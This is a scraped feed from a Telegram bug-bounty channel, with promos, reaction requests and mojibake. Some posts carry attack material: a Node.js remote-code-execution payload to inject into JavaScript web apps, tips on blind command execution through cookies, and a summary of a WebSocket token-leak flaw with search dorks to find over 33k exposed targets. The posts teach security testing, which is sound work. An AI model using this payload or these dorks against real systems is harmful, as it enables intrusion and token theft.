Brut Security pinned ยซ๐ Please donโt forget to react to the post and share it. Your reactions motivate us to post more content like this. You can also tap the โญ๏ธ to show your support. Thanks!ยป
This media is not supported in your browser
VIEW IN TELEGRAM
๐ก๏ธ CVE | Cyber Vulnerabilities Exchange
A professional channel focused on verified CVEs, critical vulnerabilities, exploit research, and technical security analysis.
What youโll get:
โข Newly disclosed vulnerabilities
โข Exploit research and PoCs
โข Technical breakdowns and mitigation insights
โข Offensive and defensive security discussions
โข Practical input for pentesters and security professionals
Clear, technical, and research-driven. No noise, no exaggeration.
โ ๏ธ Shared for educational and security awareness purposes only.
Channel: https://t.me/cve0day
A professional channel focused on verified CVEs, critical vulnerabilities, exploit research, and technical security analysis.
What youโll get:
โข Newly disclosed vulnerabilities
โข Exploit research and PoCs
โข Technical breakdowns and mitigation insights
โข Offensive and defensive security discussions
โข Practical input for pentesters and security professionals
Clear, technical, and research-driven. No noise, no exaggeration.
โ ๏ธ Shared for educational and security awareness purposes only.
Channel: https://t.me/cve0day
โค10
Please open Telegram to view this post
VIEW IN TELEGRAM
โค13
Brut Security pinned ยซ๐ ๐ ๐ ๐ Please donโt forget to react to the post and share it. Your reactions motivate us to post more content like this. You can also tap the โญ๏ธ to show your support. Thanks!๐ ๐ ๐ ยป
Hey Hunter's,
DarkShadow is here back again!
๐Blind Remote Code Execution in Cookiesโ
NOTE:
โin some servers use sh as default not bash, so in your payload sh payloads are perfect.
โdon't forget to check the cookies while you tested any webapp, because in some cases Cookies are intersect with bash process.
โLast but seriously important, Always use burp collab for blind testing...
So guy's if you really Enjoy to read my such methods then show your love โฅ๏ธ
#bugbountytips #rce #darkshadow
DarkShadow is here back again!
๐Blind Remote Code Execution in Cookiesโ
NOTE:
โin some servers use sh as default not bash, so in your payload sh payloads are perfect.
โdon't forget to check the cookies while you tested any webapp, because in some cases Cookies are intersect with bash process.
โLast but seriously important, Always use burp collab for blind testing...
So guy's if you really Enjoy to read my such methods then show your love โฅ๏ธ
#bugbountytips #rce #darkshadow
โค8๐ฅ3๐1
๐จ CVE-2026-25253: OpenClaw Logical Flaw
Critical Token Leakage via Unsanitized WebSocket Redirect!
An attacker crafts a malicious URL containing a controlled gatewayUrl query parameter and embedded token, causing OpenClaw to silently establish a WebSocket connection to the attacker-controlled endpoint and exfiltrate the sensitive token without user interaction or consent.
Full Vulnerability Details & Analysis at DarkEye:
๐ https://darkeye.org/vuln/cve/CVE-2026-25253
๐ Identify Targets via ZoomEye:
Filter: vul.cve="CVE-2026-25253"
Search Dork: app="OpenClaw"
Exposure: 33k+ instances identified globally.
ZoomEye Search Link:
๐ https://www.zoomeye.ai/searchResult?q=YXBwPSJPcGVuQ2xhdyI=&utm_source=twitter&utm_medium=social&utm_campaign=cve_ops_20260213
Critical Token Leakage via Unsanitized WebSocket Redirect!
An attacker crafts a malicious URL containing a controlled gatewayUrl query parameter and embedded token, causing OpenClaw to silently establish a WebSocket connection to the attacker-controlled endpoint and exfiltrate the sensitive token without user interaction or consent.
Full Vulnerability Details & Analysis at DarkEye:
๐ https://darkeye.org/vuln/cve/CVE-2026-25253
๐ Identify Targets via ZoomEye:
Filter: vul.cve="CVE-2026-25253"
Search Dork: app="OpenClaw"
Exposure: 33k+ instances identified globally.
ZoomEye Search Link:
๐ https://www.zoomeye.ai/searchResult?q=YXBwPSJPcGVuQ2xhdyI=&utm_source=twitter&utm_medium=social&utm_campaign=cve_ops_20260213
โค2๐ฅ2
Hey Hunterโs,
DarkShadow is here back again, dropping a another RCE methd!
Remote Code Execution - js framework
process.mainModule.require('child_process').execSync('id').toString()
THIS IS A VERY EFFECTIVE PAYLOAD FOR RCE IN JS FRAMEWORK, so when you test any js based webapp don't forget to apply it
#bugbountytips #rce
DarkShadow is here back again, dropping a another RCE methd!
Remote Code Execution - js framework
process.mainModule.require('child_process').execSync('id').toString()
THIS IS A VERY EFFECTIVE PAYLOAD FOR RCE IN JS FRAMEWORK, so when you test any js based webapp don't forget to apply it
#bugbountytips #rce
๐ฅ4
๐ค Hackersโ Valentineโs Day be likeโฆ ๐ป
Love is temporary,
But bug bounty is permanent.
๐ฅ !SO STAY HACKED! ๐ฅ
Love is temporary,
But bug bounty is permanent.
๐ฅ !SO STAY HACKED! ๐ฅ
โค8
On February 14, we crossed 100,000 total views on the Brut Security YouTube channel.
If you are new here, welcome to a community built on real skills and real mindset.
Please open Telegram to view this post
VIEW IN TELEGRAM
2โค10๐ฅ1๐1
Forwarded from โธ๊ ๊ ๊ ๊ ๊ ๊ ๊ ๊ ๊ ๊ ๊ ๊ ๊ ๊ ๊ ๊ ๊ ๊ ๊ ๊ ๊ ๊ ๊ ๊ ๊ ๊ ๊ ๊ ๊ ๊ ๊ ๊ ๊ ๊ ๊ ๊ ๊ ๊ Moonfoxes ๐
The results come very quickly!
DM @Mm_fit
Channel https://t.me/cve0day
Please open Telegram to view this post
VIEW IN TELEGRAM
๐ฅ4โค1๐1
Please open Telegram to view this post
VIEW IN TELEGRAM
๐3